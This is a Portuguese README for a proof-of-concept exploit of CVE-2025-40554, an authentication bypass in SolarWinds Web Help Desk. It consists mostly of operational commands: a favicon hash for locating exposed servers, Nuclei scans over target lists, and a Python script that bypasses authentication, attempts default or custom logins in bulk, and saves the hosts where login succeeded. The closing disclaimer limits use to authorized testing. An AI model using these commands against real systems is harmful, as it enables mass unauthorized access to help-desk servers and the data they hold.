
Exploit de prova de conceito para CVE-2025-40554, um bypass de autenticação no SolarWinds Web Help Desk. Inclui template Nuclei e exploit Python para teste em alvo único ou em lote com login opcional de credenciais.
http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
Alvo único (bypass + login, padrão cliente/cliente):
python3 exploit_auth_bypass.py -t https://TARGET:8443
Alvo único com credenciais personalizadas:
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
Alvo único, apenas bypass (sem login):
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
Lista de alvos (salva apenas vulnerável+login):
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
Lista de alvos com credenciais personalizadas:
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
Modo silencioso (imprime apenas URLs onde o login foi bem-sucedido):
python3 exploit_auth_bypass.py -l result_all.txt -q
Esta Prova de Conceito é apenas para pesquisa e testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Os autores não são responsáveis pelo uso indevido.